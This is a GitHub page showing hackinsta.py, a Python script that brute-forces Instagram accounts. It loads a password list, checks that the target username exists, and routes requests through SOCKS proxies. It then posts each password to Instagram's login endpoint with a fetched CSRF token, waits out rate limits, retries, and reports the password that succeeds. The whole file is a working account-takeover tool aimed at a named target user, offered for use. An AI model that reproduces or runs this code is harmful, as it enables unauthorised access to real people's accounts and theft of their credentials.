forked from mark0909099/instahack
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathhackinsta.py
92 lines (75 loc) · 2.67 KB
/
hackinsta.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
import requests
import argparse
import os
import codecs
import time
import socket
import socks
socket.socket = socks.socksocket
base_url = 'https://www.instagram.com'
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'
def user_exists(username):
return requests.get(f'{base_url}/{username}', headers={
'user-agent': user_agent
}).status_code != 404
def clean_list(items):
new_list = []
for item in items:
if item and item not in new_list:
new_list.append(item)
return new_list
def countdown(t):
while t:
mins, secs = divmod(t, 60)
print(f'{mins:02d}:{secs:02d}', end='\r')
time.sleep(1)
t -= 1
parser = argparse.ArgumentParser()
parser.add_argument('username', help='Instagram username of the user you want to attack')
parser.add_argument('passwords_file', help='A passwords file for the software')
args = parser.parse_args()
if not os.path.exists(args.passwords_file):
exit(f'[*] Sorry, can\'t find file named "{args.passwords_file}"')
else:
with codecs.open(args.passwords_file, 'r', 'utf-8') as file:
passwords = clean_list(file.read().splitlines())
if len(passwords) < 1:
exit('[*] The file is empty')
else:
print(f'[*] {len(passwords)} passwords loaded successfully')
if not user_exists(args.username):
exit(f'[*] Sorry, can\'t find user named "{args.username}"')
tries_counter = 0
for password in passwords:
tries_counter += 1
sess = requests.Session()
csrftoken = requests.get(base_url).cookies['csrftoken']
login_req = sess.post(f'{base_url}/accounts/login/ajax/', headers={
'origin': 'https://www.instagram.com',
'pragma': 'no-cache',
'referer': 'https://www.instagram.com/accounts/login/',
'user-agent': user_agent,
'x-csrftoken': csrftoken,
'x-requested-with': 'XMLHttpRequest'
}, data={
'username': args.username,
'password': password,
'queryParams': '{}'
})
print(login_req.text)
# or 'checkpoint_required' in login_req.text
if '"authenticated": true' in login_req.text:
print(f'[*] Login success {[args.username, password]}')
break
else:
print(f'[{tries_counter}] Can\'t login with "{password}"')
if '"authenticated": false' in login_req.text:
pass
elif 'Please wait a few minutes before you try again.' in login_req.text:
print('[*] You should wait 10 minutes')
countdown(600)
# we want to try again, i know that this the most lazy way to fix that
passwords.insert(tries_counter, password)
else:
exit(f'Unknown error, Open an issue on github with this content "{login_req.text}" and more details please')
input('[*] Press enter to exit')